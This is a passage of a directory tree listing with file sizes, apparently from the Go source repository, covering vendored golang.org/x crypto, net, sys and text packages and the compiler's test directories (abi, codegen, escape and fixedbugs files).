│ │ │ │ │ ├── [ 761] chacha_s390x.go
│ │ │ │ │ ├── [5.4K] chacha_s390x.s
│ │ │ │ │ └── [1.2K] xor.go
│ │ │ │ ├── [4.0K] chacha20poly1305
│ │ │ │ │ ├── [2.4K] chacha20poly1305_amd64.go
│ │ │ │ │ ├── [105K] chacha20poly1305_amd64.s
│ │ │ │ │ ├── [2.2K] chacha20poly1305_generic.go
│ │ │ │ │ ├── [2.8K] chacha20poly1305.go
│ │ │ │ │ ├── [ 562] chacha20poly1305_noasm.go
│ │ │ │ │ └── [2.5K] xchacha20poly1305.go
│ │ │ │ ├── [ 171] CONTRIBUTORS
│ │ │ │ ├── [4.0K] cryptobyte
│ │ │ │ │ ├── [4.0K] asn1
│ │ │ │ │ │ └── [1.6K] asn1.go
│ │ │ │ │ ├── [ 21K] asn1.go
│ │ │ │ │ ├── [9.4K] builder.go
│ │ │ │ │ └── [4.4K] string.go
│ │ │ │ ├── [4.0K] curve25519
│ │ │ │ │ ├── [4.0K] curve25519.go
│ │ │ │ │ └── [4.0K] internal
│ │ │ │ │ └── [4.0K] field
│ │ │ │ │ ├── [ 397] fe_amd64.go
│ │ │ │ │ ├── [ 354] fe_amd64_noasm.go
│ │ │ │ │ ├── [5.7K] fe_amd64.s
│ │ │ │ │ ├── [ 365] fe_arm64.go
│ │ │ │ │ ├── [ 325] fe_arm64_noasm.go
│ │ │ │ │ ├── [1.1K] fe_arm64.s
│ │ │ │ │ ├── [8.4K] fe_generic.go
│ │ │ │ │ ├── [ 12K] fe.go
│ │ │ │ │ ├── [ 370] README
│ │ │ │ │ ├── [ 41] sync.checkpoint
│ │ │ │ │ └── [ 611] sync.sh
│ │ │ │ ├── [4.0K] hkdf
│ │ │ │ │ └── [2.7K] hkdf.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ ├── [4.0K] poly1305
│ │ │ │ │ │ ├── [ 956] bits_compat.go
│ │ │ │ │ │ ├── [ 501] bits_go1.13.go
│ │ │ │ │ │ ├── [ 312] mac_noasm.go
│ │ │ │ │ │ ├── [3.3K] poly1305.go
│ │ │ │ │ │ ├── [1.1K] sum_amd64.go
│ │ │ │ │ │ ├── [2.5K] sum_amd64.s
│ │ │ │ │ │ ├── [9.5K] sum_generic.go
│ │ │ │ │ │ ├── [1.1K] sum_ppc64le.go
│ │ │ │ │ │ ├── [3.3K] sum_ppc64le.s
│ │ │ │ │ │ ├── [2.0K] sum_s390x.go
│ │ │ │ │ │ └── [ 17K] sum_s390x.s
│ │ │ │ │ └── [4.0K] subtle
│ │ │ │ │ ├── [1.2K] aliasing.go
│ │ │ │ │ └── [1.4K] aliasing_purego.go
│ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ └── [1.3K] PATENTS
│ │ │ ├── [4.0K] net
│ │ │ │ ├── [ 173] AUTHORS
│ │ │ │ ├── [ 170] CONTRIBUTORS
│ │ │ │ ├── [4.0K] dns
│ │ │ │ │ └── [4.0K] dnsmessage
│ │ │ │ │ └── [ 68K] message.go
│ │ │ │ ├── [4.0K] http
│ │ │ │ │ ├── [4.0K] httpguts
│ │ │ │ │ │ ├── [1.4K] guts.go
│ │ │ │ │ │ └── [8.9K] httplex.go
│ │ │ │ │ └── [4.0K] httpproxy
│ │ │ │ │ └── [ 10K] proxy.go
│ │ │ │ ├── [4.0K] http2
│ │ │ │ │ └── [4.0K] hpack
│ │ │ │ │ ├── [7.0K] encode.go
│ │ │ │ │ ├── [ 14K] hpack.go
│ │ │ │ │ ├── [5.5K] huffman.go
│ │ │ │ │ └── [9.5K] tables.go
│ │ │ │ ├── [4.0K] idna
│ │ │ │ │ ├── [ 418] go118.go
│ │ │ │ │ ├── [ 21K] idna10.0.0.go
│ │ │ │ │ ├── [ 19K] idna9.0.0.go
│ │ │ │ │ ├── [ 323] pre_go118.go
│ │ │ │ │ ├── [4.6K] punycode.go
│ │ │ │ │ ├── [267K] tables10.0.0.go
│ │ │ │ │ ├── [271K] tables11.0.0.go
│ │ │ │ │ ├── [273K] tables12.0.0.go
│ │ │ │ │ ├── [278K] tables13.0.0.go
│ │ │ │ │ ├── [263K] tables9.0.0.go
│ │ │ │ │ ├── [1.8K] trie.go
│ │ │ │ │ └── [3.0K] trieval.go
│ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ ├── [4.0K] lif
│ │ │ │ │ ├── [2.5K] address.go
│ │ │ │ │ ├── [3.3K] binary.go
│ │ │ │ │ ├── [ 943] lif.go
│ │ │ │ │ ├── [3.7K] link.go
│ │ │ │ │ ├── [ 660] syscall.go
│ │ │ │ │ ├── [ 417] sys.go
│ │ │ │ │ ├── [ 248] sys_solaris_amd64.s
│ │ │ │ │ └── [1.9K] zsys_solaris_amd64.go
│ │ │ │ ├── [4.0K] nettest
│ │ │ │ │ ├── [ 12K] conntest.go
│ │ │ │ │ ├── [8.1K] nettest.go
│ │ │ │ │ ├── [ 434] nettest_stub.go
│ │ │ │ │ ├── [ 598] nettest_unix.go
│ │ │ │ │ └── [ 989] nettest_windows.go
│ │ │ │ ├── [1.3K] PATENTS
│ │ │ │ └── [4.0K] route
│ │ │ │ ├── [9.8K] address.go
│ │ │ │ ├── [2.8K] binary.go
│ │ │ │ ├── [ 279] empty.s
│ │ │ │ ├── [ 805] interface_announce.go
│ │ │ │ ├── [1.6K] interface_classic.go
│ │ │ │ ├── [1.9K] interface_freebsd.go
│ │ │ │ ├── [1.9K] interface.go
│ │ │ │ ├── [ 864] interface_multicast.go
│ │ │ │ ├── [2.1K] interface_openbsd.go
│ │ │ │ ├── [1.6K] message.go
│ │ │ │ ├── [1.9K] route_classic.go
│ │ │ │ ├── [4.3K] route.go
│ │ │ │ ├── [1.7K] route_openbsd.go
│ │ │ │ ├── [ 446] syscall.go
│ │ │ │ ├── [2.7K] sys_darwin.go
│ │ │ │ ├── [2.7K] sys_dragonfly.go
│ │ │ │ ├── [4.6K] sys_freebsd.go
│ │ │ │ ├── [ 969] sys.go
│ │ │ │ ├── [2.1K] sys_netbsd.go
│ │ │ │ ├── [2.1K] sys_openbsd.go
│ │ │ │ ├── [2.0K] zsys_darwin.go
│ │ │ │ ├── [2.0K] zsys_dragonfly.go
│ │ │ │ ├── [2.8K] zsys_freebsd_386.go
│ │ │ │ ├── [2.7K] zsys_freebsd_amd64.go
│ │ │ │ ├── [2.7K] zsys_freebsd_arm64.go
│ │ │ │ ├── [2.7K] zsys_freebsd_arm.go
│ │ │ │ ├── [1.9K] zsys_netbsd.go
│ │ │ │ └── [1.9K] zsys_openbsd.go
│ │ │ ├── [4.0K] sys
│ │ │ │ ├── [ 173] AUTHORS
│ │ │ │ ├── [ 170] CONTRIBUTORS
│ │ │ │ ├── [4.0K] cpu
│ │ │ │ │ ├── [ 420] asm_aix_ppc64.s
│ │ │ │ │ ├── [1.8K] byteorder.go
│ │ │ │ │ ├── [ 619] cpu_aix.go
│ │ │ │ │ ├── [3.5K] cpu_arm64.go
│ │ │ │ │ ├── [ 771] cpu_arm64.s
│ │ │ │ │ ├── [2.1K] cpu_arm.go
│ │ │ │ │ ├── [ 269] cpu_gc_arm64.go
│ │ │ │ │ ├── [ 315] cpu_gccgo_arm64.go
│ │ │ │ │ ├── [1.0K] cpu_gccgo_s390x.go
│ │ │ │ │ ├── [1.2K] cpu_gccgo_x86.c
│ │ │ │ │ ├── [ 840] cpu_gccgo_x86.go
│ │ │ │ │ ├── [ 687] cpu_gc_s390x.go
│ │ │ │ │ ├── [ 541] cpu_gc_x86.go
│ │ │ │ │ ├── [ 12K] cpu.go
│ │ │ │ │ ├── [2.1K] cpu_linux_arm64.go
│ │ │ │ │ ├── [1.4K] cpu_linux_arm.go
│ │ │ │ │ ├── [ 361] cpu_linux.go
│ │ │ │ │ ├── [ 522] cpu_linux_mips64x.go
│ │ │ │ │ ├── [ 351] cpu_linux_noinit.go
│ │ │ │ │ ├── [ 815] cpu_linux_ppc64x.go
│ │ │ │ │ ├── [ 890] cpu_linux_s390x.go
│ │ │ │ │ ├── [ 346] cpu_mips64x.go
│ │ │ │ │ ├── [ 270] cpu_mipsx.go
│ │ │ │ │ ├── [4.3K] cpu_netbsd_arm64.go
│ │ │ │ │ ├── [ 260] cpu_other_arm64.go
│ │ │ │ │ ├── [ 239] cpu_other_arm.go
│ │ │ │ │ ├── [ 299] cpu_other_mips64x.go
│ │ │ │ │ ├── [ 384] cpu_ppc64x.go
│ │ │ │ │ ├── [ 259] cpu_riscv64.go
│ │ │ │ │ ├── [4.9K] cpu_s390x.go
│ │ │ │ │ ├── [2.0K] cpu_s390x.s
│ │ │ │ │ ├── [ 454] cpu_wasm.go
│ │ │ │ │ ├── [4.6K] cpu_x86.go
│ │ │ │ │ ├── [ 642] cpu_x86.s
│ │ │ │ │ ├── [ 223] cpu_zos.go
│ │ │ │ │ ├── [ 643] cpu_zos_s390x.go
│ │ │ │ │ ├── [1.2K] hwcap_linux.go
│ │ │ │ │ ├── [ 746] syscall_aix_gccgo.go
│ │ │ │ │ └── [1011] syscall_aix_ppc64_gc.go
│ │ │ │ ├── [1.4K] LICENSE
│ │ │ │ └── [1.3K] PATENTS
│ │ │ └── [4.0K] text
│ │ │ ├── [ 173] AUTHORS
│ │ │ ├── [ 170] CONTRIBUTORS
│ │ │ ├── [1.4K] LICENSE
│ │ │ ├── [1.3K] PATENTS
│ │ │ ├── [4.0K] secure
│ │ │ │ └── [4.0K] bidirule
│ │ │ │ ├── [ 340] bidirule10.0.0.go
│ │ │ │ ├── [ 376] bidirule9.0.0.go
│ │ │ │ └── [9.3K] bidirule.go
│ │ │ ├── [4.0K] transform
│ │ │ │ └── [ 22K] transform.go
│ │ │ └── [4.0K] unicode
│ │ │ ├── [4.0K] bidi
│ │ │ │ ├── [ 10K] bidi.go
│ │ │ │ ├── [ 11K] bracket.go
│ │ │ │ ├── [ 29K] core.go
│ │ │ │ ├── [5.7K] prop.go
│ │ │ │ ├── [111K] tables10.0.0.go
│ │ │ │ ├── [117K] tables11.0.0.go
│ │ │ │ ├── [119K] tables12.0.0.go
│ │ │ │ ├── [121K] tables13.0.0.go
│ │ │ │ ├── [109K] tables9.0.0.go
│ │ │ │ └── [1.6K] trieval.go
│ │ │ └── [4.0K] norm
│ │ │ ├── [ 14K] composition.go
│ │ │ ├── [8.7K] forminfo.go
│ │ │ ├── [2.0K] input.go
│ │ │ ├── [ 11K] iter.go
│ │ │ ├── [ 15K] normalize.go
│ │ │ ├── [2.9K] readwriter.go
│ │ │ ├── [374K] tables10.0.0.go
│ │ │ ├── [376K] tables11.0.0.go
│ │ │ ├── [377K] tables12.0.0.go
│ │ │ ├── [379K] tables13.0.0.go
│ │ │ ├── [372K] tables9.0.0.go
│ │ │ ├── [2.4K] transform.go
│ │ │ └── [1.2K] trie.go
│ │ └── [ 975] modules.txt
│ ├── [ 12K] test
│ │ ├── [1.6K] 235.go
│ │ ├── [ 25K] 64bit.go
│ │ ├── [4.0K] abi
│ │ │ ├── [1.4K] bad_internal_offsets.go
│ │ │ ├── [5.7K] bad_select_crash.go
│ │ │ ├── [ 424] convF_criteria.go
│ │ │ ├── [ 25] convF_criteria.out
│ │ │ ├── [ 387] convT64_criteria.go
│ │ │ ├── [ 17] convT64_criteria.out
│ │ │ ├── [ 846] defer_aggregate.go
│ │ │ ├── [ 800] defer_recover_results.go
│ │ │ ├── [1.3K] double_nested_addressed_struct.go
│ │ │ ├── [1.1K] double_nested_struct.go
│ │ │ ├── [ 674] fibish_closure.go
│ │ │ ├── [ 25] fibish_closure.out
│ │ │ ├── [ 526] fibish.go
│ │ │ ├── [ 25] fibish.out
│ │ │ ├── [ 632] f_ret_z_not.go
│ │ │ ├── [ 2] f_ret_z_not.out
│ │ │ ├── [ 551] fuzz_trailing_zero_field.go
│ │ │ ├── [2.1K] idata.go
│ │ │ ├── [ 10] idata.out
│ │ │ ├── [ 784] leaf2.go
│ │ │ ├── [ 657] leaf.go
│ │ │ ├── [ 924] many_int_input.go
│ │ │ ├── [ 69] many_int_input.out
│ │ │ ├── [ 983] many_intstar_input.go
│ │ │ ├── [ 26] many_intstar_input.out
│ │ │ ├── [ 557] map.go
│ │ │ ├── [ 637] method_wrapper.go
│ │ │ ├── [1023] more_intstar_input.go
│ │ │ ├── [ 23] more_intstar_input.out
│ │ │ ├── [1.4K] named_results.go
│ │ │ ├── [ 198] named_results.out
│ │ │ ├── [1.5K] named_return_stuff.go
│ │ │ ├── [ 198] named_return_stuff.out
│ │ │ ├── [ 627] open_defer_1.go
│ │ │ ├── [ 986] part_live_2.go
│ │ │ ├── [ 823] part_live.go
│ │ │ ├── [ 510] result_live.go
│ │ │ ├── [ 765] result_regalloc.go
│ │ │ ├── [ 716] return_stuff.go
│ │ │ ├── [ 36] return_stuff.out
│ │ │ ├── [ 842] spills3.go
│ │ │ ├── [ 769] spills4.go
│ │ │ ├── [ 667] s_sif_sif.go
│ │ │ ├── [ 587] store_reg_args.go
│ │ │ ├── [ 743] struct_3_string_input.go
│ │ │ ├── [ 0] struct_3_string_input.out
│ │ │ ├── [ 457] struct_lower_1.go
│ │ │ ├── [ 10] struct_lower_1.out
│ │ │ ├── [ 849] too_big_to_ssa.go
│ │ │ ├── [ 37] too_big_to_ssa.out
│ │ │ ├── [1.5K] uglyfib.go
│ │ │ ├── [ 18] uglyfib.out
│ │ │ ├── [ 469] wrapdefer_largetmp.go
│ │ │ ├── [ 2] wrapdefer_largetmp.out
│ │ │ └── [ 676] zombie_struct_select.go
│ │ ├── [ 822] alg.go
│ │ ├── [ 803] alias1.go
│ │ ├── [2.8K] alias2.go
│ │ ├── [4.0K] alias3.dir
│ │ │ ├── [ 540] a.go
│ │ │ ├── [ 482] b.go
│ │ │ └── [ 490] c.go
│ │ ├── [ 187] alias3.go
│ │ ├── [ 588] alias.go
│ │ ├── [ 603] align.go
│ │ ├── [ 883] append1.go
│ │ ├── [9.1K] append.go
│ │ ├── [ 374] args.go
│ │ ├── [3.9K] armimm.go
│ │ ├── [4.0K] asmhdr.dir
│ │ │ ├── [1.8K] main.go
│ │ │ └── [ 733] main.s
│ │ ├── [ 237] asmhdr.go
│ │ ├── [5.6K] assign1.go
│ │ ├── [1.0K] assign.go
│ │ ├── [ 798] atomicload.go
│ │ ├── [4.0K] bench
│ │ │ ├── [4.0K] garbage
│ │ │ │ ├── [ 324] Makefile
│ │ │ │ ├── [5.8K] parser.go
│ │ │ │ ├── [2.0K] peano.go
│ │ │ │ ├── [1.5K] stats.go
│ │ │ │ ├── [2.2K] tree2.go
│ │ │ │ └── [3.0K] tree.go
│ │ │ └── [4.0K] go1
│ │ │ ├── [1.6K] binarytree_test.go
│ │ │ ├── [1.5K] fannkuch_test.go
│ │ │ ├── [3.7K] fasta_test.go
│ │ │ ├── [1.4K] fmt_test.go
│ │ │ ├── [1.8K] gob_test.go
│ │ │ ├── [ 31] go.mod
│ │ │ ├── [1.0K] gzip_test.go
│ │ │ ├── [ 949] http_test.go
│ │ │ ├── [115K] jsondata_test.go
│ │ │ ├── [1.6K] json_test.go
│ │ │ ├── [ 848] mandel_test.go
│ │ │ ├── [ 19K] parserdata_test.go
│ │ │ ├── [ 888] parser_test.go
│ │ │ ├── [1.6K] regexp_test.go
│ │ │ ├── [1.8K] revcomp_test.go
│ │ │ ├── [1.4K] template_test.go
│ │ │ └── [ 516] time_test.go
│ │ ├── [2.1K] bigalg.go
│ │ ├── [2.5K] bigmap.go
│ │ ├── [ 724] blank1.go
│ │ ├── [2.1K] blank.go
│ │ ├── [ 480] bombad.go
│ │ ├── [ 406] bom.go
│ │ ├── [6.1K] bounds.go
│ │ ├── [1.0K] cannotassign.go
│ │ ├── [4.0K] chan
│ │ │ ├── [2.0K] doubleselect.go
│ │ │ ├── [ 896] fifo.go
│ │ │ ├── [ 743] goroutines.go
│ │ │ ├── [3.9K] nonblock.go
│ │ │ ├── [1.4K] perm.go
│ │ │ ├── [ 13K] powser1.go
│ │ │ ├── [ 13K] powser2.go
│ │ │ ├── [1.0K] select2.go
│ │ │ ├── [4.1K] select3.go
│ │ │ ├── [ 513] select4.go
│ │ │ ├── [10.0K] select5.go
│ │ │ ├── [ 783] select6.go
│ │ │ ├── [ 932] select7.go
│ │ │ ├── [ 826] select8.go
│ │ │ ├── [ 913] select.go
│ │ │ ├── [ 672] sendstmt.go
│ │ │ ├── [1.5K] sieve1.go
│ │ │ ├── [3.9K] sieve2.go
│ │ │ └── [ 349] zerosize.go
│ │ ├── [1.6K] chancap.go
│ │ ├── [2.1K] chanlinear.go
│ │ ├── [ 822] char_lit1.go
│ │ ├── [ 657] char_lit.go
│ │ ├── [3.6K] checkbce.go
│ │ ├── [1.1K] clearfat.go
│ │ ├── [5.8K] closedchan.go
│ │ ├── [ 280] closure1.go
│ │ ├── [1.9K] closure2.go
│ │ ├── [4.0K] closure3.dir
│ │ │ └── [7.4K] main.go
│ │ ├── [ 321] closure3.go
│ │ ├── [ 364] closure4.go
│ │ ├── [4.0K] closure5.dir
│ │ │ ├── [ 375] a.go
│ │ │ └── [ 328] main.go
│ │ ├── [ 280] closure5.go
│ │ ├── [ 346] closure6.go
│ │ ├── [ 373] closure7.go
│ │ ├── [1.7K] closure.go
│ │ ├── [2.2K] cmp6.go
│ │ ├── [7.6K] cmp.go
│ │ ├── [241K] cmplxdivide1.go
│ │ ├── [2.1K] cmplxdivide.c
│ │ ├── [ 868] cmplxdivide.go
│ │ ├── [1.4K] cmplx.go
│ │ ├── [4.0K] codegen
│ │ │ ├── [ 324] addrcalc.go
│ │ │ ├── [ 902] alloc.go
│ │ │ ├── [ 15K] arithmetic.go
│ │ │ ├── [9.6K] bitfield.go
│ │ │ ├── [6.0K] bits.go
│ │ │ ├── [2.2K] bmi.go
│ │ │ ├── [ 705] bool.go
│ │ │ ├── [1.0K] clobberdead.go
│ │ │ ├── [1.3K] clobberdeadreg.go
│ │ │ ├── [3.8K] compare_and_branch.go
│ │ │ ├── [ 12K] comparisons.go
│ │ │ ├── [5.3K] condmove.go
│ │ │ ├── [3.4K] copy.go
│ │ │ ├── [3.2K] floats.go
│ │ │ ├── [4.8K] fuse.go
│ │ │ ├── [5.4K] issue22703.go
│ │ │ ├── [ 445] issue25378.go
│ │ │ ├── [ 504] issue31618.go
│ │ │ ├── [ 459] issue33580.go
│ │ │ ├── [ 355] issue38554.go
│ │ │ ├── [ 673] issue42610.go
│ │ │ ├── [ 464] issue48054.go
│ │ │ ├── [ 665] logic.go
│ │ │ ├── [9.2K] mapaccess.go
│ │ │ ├── [3.1K] maps.go
│ │ │ ├── [ 16K] mathbits.go
│ │ │ ├── [6.1K] math.go
│ │ │ ├── [ 24K] memcombine.go
│ │ │ ├── [ 12K] memops.go
│ │ │ ├── [4.8K] noextend.go
│ │ │ ├── [ 651] race.go
│ │ │ ├── [5.2K] README
│ │ │ ├── [ 494] regabi_regalloc.go
│ │ │ ├── [ 224] retpoline.go
│ │ │ ├── [5.4K] rotate.go
│ │ │ ├── [ 353] select.go
│ │ │ ├── [9.2K] shift.go
│ │ │ ├── [ 368] shortcircuit.go
│ │ │ ├── [8.1K] slices.go
│ │ │ ├── [ 500] smallintiface.go
│ │ │ ├── [ 722] spectre.go
│ │ │ ├── [3.0K] stack.go
│ │ │ ├── [2.1K] strings.go
│ │ │ ├── [ 887] structs.go
│ │ │ ├── [1.0K] switch.go
│ │ │ └── [ 610] zerosize.go
│ │ ├── [1.6K] complit1.go
│ │ ├── [1.7K] complit.go
│ │ ├── [ 403] compos.go
│ │ ├── [3.8K] const1.go
│ │ ├── [1008] const2.go
│ │ ├── [ 659] const3.go
│ │ ├── [1.3K] const4.go
│ │ ├── [ 835] const5.go
│ │ ├── [ 834] const6.go
│ │ ├── [1.7K] const7.go
│ │ ├── [4.8K] const.go
│ │ ├── [3.4K] convert1.go
│ │ ├── [5.9K] convert2.go
│ │ ├── [ 544] convert3.go
│ │ ├── [1.6K] convert4.go
│ │ ├── [ 833] convert.go
│ │ ├── [ 458] convlit1.go
│ │ ├── [2.4K] convlit.go
│ │ ├── [3.3K] convT2X.go
│ │ ├── [ 851] copy1.go
│ │ ├── [6.6K] copy.go
│ │ ├── [ 782] crlf.go
│ │ ├── [1.7K] ddd1.go
│ │ ├── [4.0K] ddd2.dir
│ │ │ ├── [ 316] ddd2.go
│ │ │ └── [ 583] ddd3.go
│ │ ├── [ 252] ddd2.go
│ │ ├── [4.2K] ddd.go
│ │ ├── [1.4K] declbad.go
│ │ ├── [ 926] decl.go
│ │ ├── [1.4K] defererrcheck.go
│ │ ├── [1.1K] deferfin.go
│ │ ├── [ 875] defer.go
│ │ ├── [ 563] defernil.go
│ │ ├── [ 586] deferprint.go
│ │ ├── [ 126] deferprint.out
│ │ ├── [ 574] devirt.go
│ │ ├── [1.2K] directive2.go
│ │ ├── [1.3K] directive.go
│ │ ├── [1.2K] divide.go
│ │ ├── [9.3K] divmod.go
│ │ ├── [4.0K] dwarf
│ │ │ ├── [4.0K] dwarf.dir
│ │ │ │ ├── [ 477] main.go
│ │ │ │ ├── [ 46] z10.go
│ │ │ │ ├── [ 44] z11.go
│ │ │ │ ├── [ 44] z12.go
│ │ │ │ ├── [ 44] z13.go
│ │ │ │ ├── [ 44] z14.go
│ │ │ │ ├── [ 44] z15.go
│ │ │ │ ├── [ 44] z16.go
│ │ │ │ ├── [ 44] z17.go
│ │ │ │ ├── [ 45] z18.go
│ │ │ │ ├── [ 44] z19.go
│ │ │ │ ├── [ 43] z1.go
│ │ │ │ ├── [ 44] z20.go
│ │ │ │ ├── [ 42] z2.go
│ │ │ │ ├── [ 42] z3.go
│ │ │ │ ├── [ 42] z4.go
│ │ │ │ ├── [ 42] z5.go
│ │ │ │ ├── [ 42] z6.go
│ │ │ │ ├── [ 42] z7.go
│ │ │ │ ├── [ 42] z8.go
│ │ │ │ └── [ 42] z9.go
│ │ │ ├── [ 268] dwarf.go
│ │ │ └── [1.5K] linedirectives.go
│ │ ├── [ 308] embedfunc.go
│ │ ├── [ 292] embedvers.go
│ │ ├── [ 316] empty.go
│ │ ├── [ 585] env.go
│ │ ├── [ 333] eof1.go
│ │ ├── [ 308] eof.go
│ │ ├── [ 35K] escape2.go
│ │ ├── [ 35K] escape2n.go
│ │ ├── [ 524] escape3.go
│ │ ├── [1.3K] escape4.go
│ │ ├── [5.3K] escape5.go
│ │ ├── [3.6K] escape_array.go
│ │ ├── [1.3K] escape_calls.go
│ │ ├── [4.2K] escape_closure.go
│ │ ├── [2.9K] escape_field.go
│ │ ├── [3.8K] escape.go
│ │ ├── [ 677] escape_goto.go
│ │ ├── [ 368] escape_hash_maphash.go
│ │ ├── [4.5K] escape_iface.go
│ │ ├── [3.3K] escape_indir.go
│ │ ├── [1.8K] escape_level.go
│ │ ├── [2.8K] escape_map.go
│ │ ├── [8.9K] escape_param.go
│ │ ├── [ 874] escape_runtime_atomic.go
│ │ ├── [ 538] escape_selfassign.go
│ │ ├── [3.8K] escape_slice.go
│ │ ├── [8.9K] escape_struct_param1.go
│ │ ├── [8.9K] escape_struct_param2.go
│ │ ├── [1.0K] escape_struct_return.go
│ │ ├── [ 943] escape_sync_atomic.go
│ │ ├── [2.2K] escape_unsafe.go
│ │ ├── [6.3K] fibo.go
│ │ ├── [2.0K] finprofiled.go
│ │ ├── [ 68K] fixedbugs
│ │ │ ├── [ 302] bug000.go
│ │ │ ├── [ 281] bug002.go
│ │ │ ├── [ 306] bug003.go
│ │ │ ├── [ 300] bug004.go
│ │ │ ├── [ 325] bug005.go
│ │ │ ├── [ 350] bug006.go
│ │ │ ├── [ 481] bug007.go
│ │ │ ├── [ 405] bug008.go
│ │ │ ├── [ 357] bug009.go
│ │ │ ├── [ 450] bug010.go
│ │ │ ├── [ 460] bug011.go
│ │ │ ├── [ 756] bug012.go
│ │ │ ├── [ 411] bug013.go
│ │ │ ├── [ 416] bug014.go
│ │ │ ├── [ 269] bug015.go
│ │ │ ├── [ 410] bug016.go
│ │ │ ├── [ 888] bug017.go
│ │ │ ├── [ 486] bug020.go
│ │ │ ├── [ 235] bug021.go
│ │ │ ├── [ 529] bug022.go
│ │ │ ├── [ 453] bug023.go
│ │ │ ├── [ 389] bug024.go
│ │ │ ├── [ 447] bug026.go
│ │ │ ├── [1.2K] bug027.go
│ │ │ ├── [ 416] bug028.go
│ │ │ ├── [ 255] bug030.go
│ │ │ ├── [ 802] bug031.go
│ │ │ ├── [ 324] bug035.go
│ │ │ ├── [ 239] bug037.go
│ │ │ ├── [ 277] bug039.go
│ │ │ ├── [ 293] bug040.go
│ │ │ ├── [ 320] bug045.go
│ │ │ ├── [ 299] bug046.go
│ │ │ ├── [ 352] bug047.go
│ │ │ ├── [ 246] bug048.go
│ │ │ ├── [ 341] bug049.go
│ │ │ ├── [ 219] bug050.go
│ │ │ ├── [ 267] bug051.go
│ │ │ ├── [ 341] bug052.go
│ │ │ ├── [ 276] bug053.go
│ │ │ ├── [ 669] bug054.go
│ │ │ ├── [ 381] bug055.go
│ │ │ ├── [ 364] bug056.go
│ │ │ ├── [ 426] bug057.go
│ │ │ ├── [ 420] bug058.go
│ │ │ ├── [ 558] bug059.go
│ │ │ ├── [ 325] bug060.go
│ │ │ ├── [ 357] bug061.go
│ │ │ ├── [ 272] bug062.go
│ │ │ ├── [ 203] bug063.go
│ │ │ ├── [ 342] bug064.go
│ │ │ ├── [ 237] bug065.go
│ │ │ ├── [ 385] bug066.go
│ │ │ ├── [ 266] bug067.go
│ │ │ ├── [ 520] bug068.go
│ │ │ ├── [ 413] bug069.go
│ │ │ ├── [ 715] bug070.go
│ │ │ ├── [ 336] bug071.go
│ │ │ ├── [ 242] bug072.go
│ │ │ ├── [ 312] bug073.go
│ │ │ ├── [ 267] bug074.go
│ │ │ ├── [ 385] bug075.go
│ │ │ ├── [ 400] bug076.go
│ │ │ ├── [ 243] bug077.go
│ │ │ ├── [ 258] bug078.go
│ │ │ ├── [ 435] bug080.go
│ │ │ ├── [ 303] bug081.go
│ │ │ ├── [ 413] bug082.go
│ │ │ ├── [4.0K] bug083.dir
│ │ │ │ ├── [ 204] bug0.go
│ │ │ │ └── [ 372] bug1.go
│ │ │ ├── [ 194] bug083.go
│ │ │ ├── [ 421] bug084.go
│ │ │ ├── [ 633] bug085.go
│ │ │ ├── [ 440] bug086.go
│ │ │ ├── [ 453] bug087.go
│ │ │ ├── [4.0K] bug088.dir
│ │ │ │ ├── [ 242] bug0.go
│ │ │ │ └── [ 550] bug1.go
│ │ │ ├── [ 183] bug088.go
│ │ │ ├── [ 350] bug089.go
│ │ │ ├── [ 883] bug090.go
│ │ │ ├── [ 329] bug091.go
│ │ │ ├── [ 474] bug092.go
│ │ │ ├── [1.1K] bug093.go
│ │ │ ├── [ 517] bug094.go
│ │ │ ├── [ 483] bug096.go
│ │ │ ├── [1.1K] bug097.go
│ │ │ ├── [ 582] bug098.go
│ │ │ ├── [ 637] bug099.go
│ │ │ ├── [ 376] bug101.go
│ │ │ ├── [ 525] bug102.go
│ │ │ ├── [ 289] bug103.go
│ │ │ ├── [ 245] bug104.go
│ │ │ ├── [4.0K] bug106.dir
│ │ │ │ ├── [ 187] bug0.go
│ │ │ │ └── [ 193] bug1.go
│ │ │ ├── [ 183] bug106.go
│ │ │ ├── [ 391] bug107.go
│ │ │ ├── [ 268] bug108.go
│ │ │ ├── [ 523] bug109.go
│ │ │ ├── [ 291] bug110.go
│ │ │ ├── [ 427] bug111.go
│ │ │ ├── [ 301] bug112.go
│ │ │ ├── [ 693] bug113.go
│ │ │ ├── [ 556] bug114.go
│ │ │ ├── [ 255] bug115.go
│ │ │ ├── [ 646] bug116.go
│ │ │ ├── [ 523] bug117.go
│ │ │ ├── [ 264] bug118.go
│ │ │ ├── [ 697] bug119.go
│ │ │ ├── [1.8K] bug120.go
│ │ │ ├── [ 321] bug121.go
│ │ │ ├── [ 327] bug122.go
│ │ │ ├── [ 283] bug123.go
│ │ │ ├── [ 339] bug126.go
│ │ │ ├── [ 334] bug127.go
│ │ │ ├── [ 576] bug128.go
│ │ │ ├── [ 248] bug129.go
│ │ │ ├── [ 400] bug130.go
│ │ │ ├── [ 282] bug131.go
│ │ │ ├── [ 250] bug132.go
│ │ │ ├── [ 409] bug13343.go
│ │ │ ├── [4.0K] bug133.dir
│ │ │ │ ├── [ 198] bug0.go
│ │ │ │ ├── [ 218] bug1.go
│ │ │ │ └── [ 426] bug2.go
│ │ │ ├── [ 194] bug133.go
│ │ │ ├── [ 340] bug135.go
│ │ │ ├── [ 485] bug136.go
│ │ │ ├── [ 440] bug137.go
│ │ │ ├── [ 416] bug139.go
│ │ │ ├── [ 409] bug140.go
│ │ │ ├── [ 491] bug141.go
│ │ │ ├── [ 675] bug142.go
│ │ │ ├── [ 647] bug143.go
│ │ │ ├── [ 404] bug144.go
│ │ │ ├── [ 270] bug145.go
│ │ │ ├── [ 354] bug146.go
│ │ │ ├── [ 411] bug147.go
│ │ │ ├── [ 750] bug148.go
│ │ │ ├── [ 506] bug149.go
│ │ │ ├── [ 386] bug150.go
│ │ │ ├── [ 320] bug1515.go
│ │ │ ├── [ 350] bug151.go
│ │ │ ├── [ 292] bug152.go
│ │ │ ├── [ 585] bug154.go
│ │ │ ├── [ 525] bug155.go
│ │ │ ├── [ 346] bug156.go
│ │ │ ├── [ 524] bug157.go
│ │ │ ├── [ 370] bug158.go
│ │ │ ├── [ 795] bug159.go
│ │ │ ├── [4.0K] bug160.dir
│ │ │ │ ├── [ 205] x.go
│ │ │ │ └── [ 348] y.go
│ │ │ ├── [ 187] bug160.go
│ │ │ ├── [ 295] bug161.go
│ │ │ ├── [ 249] bug163.go
│ │ │ ├── [ 284] bug164.go
│ │ │ ├── [ 292] bug165.go
│ │ │ ├── [ 462] bug167.go
